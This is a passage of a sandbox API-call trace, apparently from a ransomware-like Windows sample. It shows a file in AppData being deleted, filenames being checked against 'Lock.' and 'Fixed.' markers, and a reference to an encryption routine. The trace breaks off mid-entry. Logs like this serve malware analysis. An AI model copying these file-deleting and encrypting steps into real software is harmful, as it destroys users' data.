[0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0232.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/IYqWm9FjXEquwVFEM.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\IYqWm9FjXEquwVFEM.wav", lpFilePart=0x8cedf4*="IYqWm9FjXEquwVFEM.wav") returned 0x35 [0232.984] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\IYqWm9FjXEquwVFEM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\iyqwm9fjxequwvfem.wav")) returned 0x20 [0232.984] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\IYqWm9FjXEquwVFEM.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365f2f00, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0xb903a490, ftLastAccessTime.dwHighDateTime=0x1d5f019, ftLastWriteTime.dwLowDateTime=0xb903a490, ftLastWriteTime.dwHighDateTime=0x1d5f019, nFileSizeHigh=0x0, nFileSizeLow=0xcb91, dwReserved0=0x1, dwReserved1=0x1c, cFileName="IYqWm9FjXEquwVFEM.wav", cAlternateFileName="IYQWM9~1.WAV")) returned 0xa87410 [0232.985] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\IYqWm9FjXEquwVFEM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\iyqwm9fjxequwvfem.wav")) returned 1 [0233.028] FindNextFileW (in: hFindFile=0xa87410, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365f2f00, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0xb903a490, ftLastAccessTime.dwHighDateTime=0x1d5f019, ftLastWriteTime.dwLowDateTime=0xb903a490, ftLastWriteTime.dwHighDateTime=0x1d5f019, nFileSizeHigh=0x0, nFileSizeLow=0xcb91, dwReserved0=0x1, dwReserved1=0x1c, cFileName="IYqWm9FjXEquwVFEM.wav", cAlternateFileName="IYQWM9~1.WAV")) returned 0 [0233.028] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0233.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0233.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0233.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0233.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0233.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0233.029] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0233.029] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0233.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0233.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0233.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0233.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0233.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0233.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6c) returned 0x2e564e0 [0233.030] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/IYqWm9FjXEquwVFEM.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\IYqWm9FjXEquwVFEM.wav", lpFilePart=0x8cf650*="IYqWm9FjXEquwVFEM.wav") returned 0x35 [0233.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0233.030] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\IYqWm9FjXEquwVFEM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\iyqwm9fjxequwvfem.wav")) returned 0xffffffff [0233.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0233.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0233.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0233.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0233.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0233.075] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0233.076] TranslateMessage (lpMsg=0x8cf968) returned 0 [0233.076] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0233.076] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0233.076] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0233.076] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0233.076] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.076] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0233.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0233.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0233.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0233.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K KvEQBDpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" KvEQBDpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KvEQBDpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vEQBDpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQBDpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QBDpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BDpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DpvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pvTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vTatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TatLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tLEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LEa.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ea.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0233.077] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0233.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0233.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0233.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0233.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0233.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0233.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0233.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0233.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2f04460 [0233.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K KvEQBDpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" KvEQBDpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KvEQBDpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vEQBDpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQBDpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QBDpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BDpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0233.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DpvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0233.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pvTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vTatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TatLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0233.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tLEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LEa.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0233.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ea.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0233.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0233.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0233.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0233.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0233.301] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0233.301] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0233.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0233.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0233.302] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0233.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0233.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0233.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0233.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0233.302] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0233.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0233.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0233.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0233.304] HeapFree (in: 